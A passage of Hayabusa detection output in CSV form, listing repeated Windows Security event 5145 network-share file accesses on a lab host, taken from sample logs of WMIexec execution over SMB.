Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 